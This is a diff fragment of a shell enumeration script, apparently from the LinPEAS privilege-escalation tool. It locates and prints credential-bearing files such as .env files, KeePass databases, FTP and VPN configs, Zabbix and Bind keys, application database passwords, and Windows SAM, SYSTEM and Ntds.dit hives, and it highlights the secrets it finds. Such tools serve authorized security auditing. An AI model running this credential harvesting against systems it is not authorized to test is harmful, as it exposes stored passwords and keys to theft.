+ if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".env"; fi; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB],${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_MSMTPRC" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Msmtprc Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".msmtprc"; fi; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_KEEPASS" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Keepass Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.kdbx"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.config*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.ini"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.enforced*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_FTP" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing FTP Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ftpconfig"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ffftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.config"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.config$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,ftp\.config$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "sites\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "wcx_ftp\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "winscp\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_ROCKETCHAT" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Rocketchat Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_ROCKETCHAT\" | grep -E \"rocketchat\.service$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rocketchat.service"; fi; fi; printf "%s" "$PSTORAGE_ROCKETCHAT" | grep -E "rocketchat\.service$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,rocketchat\.service$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E -i "Environment" | sed -${E} "s,mongodb://.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_GLUSTERFS" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing GlusterFS Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.pem$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "glusterfs.pem"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" | grep -E "glusterfs\.pem$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,glusterfs\.pem$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.ca$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "glusterfs.ca"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" | grep -E "glusterfs\.ca$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,glusterfs\.ca$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "glusterfs.key"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" | grep -E "glusterfs\.key$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,glusterfs\.key$,${SED_RED},"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_RACOON" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Racoon Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "racoon.conf"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"psk\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "psk.txt"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "psk\.txt$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_OPERA" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Opera Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_OPERA\" | grep -E \"com\.operasoftware\.Opera$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "com.operasoftware.Opera"; fi; fi; printf "%s" "$PSTORAGE_OPERA" | grep -E "com\.operasoftware\.Opera$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,com\.operasoftware\.Opera$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_SAFARI" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Safari Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_SAFARI\" | grep -E \"Safari$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Safari"; fi; fi; printf "%s" "$PSTORAGE_SAFARI" | grep -E "Safari$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,Safari$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_INFLUXDB" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing InfluxDB Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_INFLUXDB\" | grep -E \"influxdb\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "influxdb.conf"; fi; fi; printf "%s" "$PSTORAGE_INFLUXDB" | grep -E "influxdb\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,influxdb\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,auth-enabled.*=.*false|token|https-private-key,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_ZABBIX" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Zabbix Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_server\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix_server.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_server\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,zabbix_server\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,DBName|DBUser|DBPassword,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_agentd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix_agentd.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_agentd\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,zabbix_agentd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,TLSPSKFile|psk,${SED_RED},g"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,zabbix$,${SED_RED},"; find "$f" -name "*.psk" | while read ff; do ls -ld "$ff" | sed -${E} "s,.psk,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";
+fi
+
+
+if [ "$PSTORAGE_PRE_SHARED_KEYS" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Pre-Shared Keys Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_PRE_SHARED_KEYS\" | grep -E \"\.psk$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.psk"; fi; fi; printf "%s" "$PSTORAGE_PRE_SHARED_KEYS" | grep -E "\.psk$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.psk$,${SED_RED},"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_PASS_STORE_DIRECTORIES" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Pass Store Directories Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_PASS_STORE_DIRECTORIES\" | grep -E \"\.password-store$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".password-store"; fi; fi; printf "%s" "$PSTORAGE_PASS_STORE_DIRECTORIES" | grep -E "\.password-store$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.password-store$,${SED_RED},"; ls -lRA "$f";done; echo "";
+fi
+
+
+if [ "$PSTORAGE_BIND" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Bind Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_BIND\" | grep -E \"bind$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bind"; fi; fi; printf "%s" "$PSTORAGE_BIND" | grep -E "bind$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,bind$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo "";
+fi
+
+
+if [ "$PSTORAGE_SEEDDMS" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing SeedDMS Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_SEEDDMS\" | grep -E \"seeddms.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "seeddms*"; fi; fi; printf "%s" "$PSTORAGE_SEEDDMS" | grep -E "seeddms.*$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,seeddms.*$,${SED_RED},"; find "$f" -name "settings.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "=" | sed -${E} "s,[pP][aA][sS][sS],${SED_RED},g"; done; echo "";done; echo "";
+fi
+
+
+if [ "$PSTORAGE_DDCLIENT" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Ddclient Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_DDCLIENT\" | grep -E \"ddclient\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ddclient.conf"; fi; fi; printf "%s" "$PSTORAGE_DDCLIENT" | grep -E "ddclient\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,ddclient\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*password.*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_SENTRY" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Sentry Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sentry"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,sentry$,${SED_RED},"; find "$f" -name "config.yml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,*key*,${SED_RED},g"; done; echo "";done; echo "";
+ if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry\.conf\.py$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sentry.conf.py"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry\.conf\.py$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,sentry\.conf\.py$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_STRAPI" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Strapi Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_STRAPI\" | grep -E \"environments$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "environments"; fi; fi; printf "%s" "$PSTORAGE_STRAPI" | grep -E "environments$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,environments$,${SED_RED},"; find "$f" -name "custom.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,custom.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "database.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,database.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "request.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,request.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "response.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,response.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "security.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,security.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "server.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,server.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";done; echo "";
+fi
+
+
+if [ "$PSTORAGE_CACTI" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Cacti Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_CACTI\" | grep -E \"cacti$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cacti"; fi; fi; printf "%s" "$PSTORAGE_CACTI" | grep -E "cacti$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,cacti$,${SED_RED},"; find "$f" -name "config.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "config.php.dist" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.php.dist,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "installer.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,installer.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "check_all_pages" | while read ff; do ls -ld "$ff" | sed -${E} "s,check_all_pages,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";done; echo "";
+fi
+
+
+if [ "$PSTORAGE_ROUNDCUBE" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Roundcube Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_ROUNDCUBE\" | grep -E \"roundcube$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "roundcube"; fi; fi; printf "%s" "$PSTORAGE_ROUNDCUBE" | grep -E "roundcube$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,roundcube$,${SED_RED},"; find "$f" -name "config.inc.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.inc.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "config\[" | sed -${E} "s,db_dsnw,${SED_RED},g"; done; echo "";done; echo "";
+fi
+
+
+if [ "$PSTORAGE_PASSBOLT" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Passbolt Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "passbolt.php"; fi; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_JETTY" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Jetty Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_JETTY\" | grep -E \"jetty-realm\.properties$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "jetty-realm.properties"; fi; fi; printf "%s" "$PSTORAGE_JETTY" | grep -E "jetty-realm\.properties$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,jetty-realm\.properties$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
+fi
+
+
+
+
+if [ "$PSTORAGE_INTERESTING_LOGS" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Interesting logs Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,access\.log$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "error.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,error\.log$,${SED_RED},"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_WINDOWS" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Windows Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.inf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"\.rdg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.rdg"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "\.rdg$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"AppEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AppEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "AppEvent\.Evt$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ConsoleHost_history\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ConsoleHost_history.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "ConsoleHost_history\.txt$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,ConsoleHost_history\.txt$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "FreeSSHDservice.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "FreeSSHDservice\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"NetSetup\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "NetSetup.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "NetSetup\.log$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"Ntds\.dit$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Ntds.dit"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "Ntds\.dit$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,Ntds\.dit$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"protecteduserkey\.bin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "protecteduserkey.bin"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "protecteduserkey\.bin$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,protecteduserkey\.bin$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"RDCMan\.settings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "RDCMan.settings"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "RDCMan\.settings$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SAM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SAM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SAM$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,SAM$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SYSTEM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SYSTEM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SYSTEM$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo "";
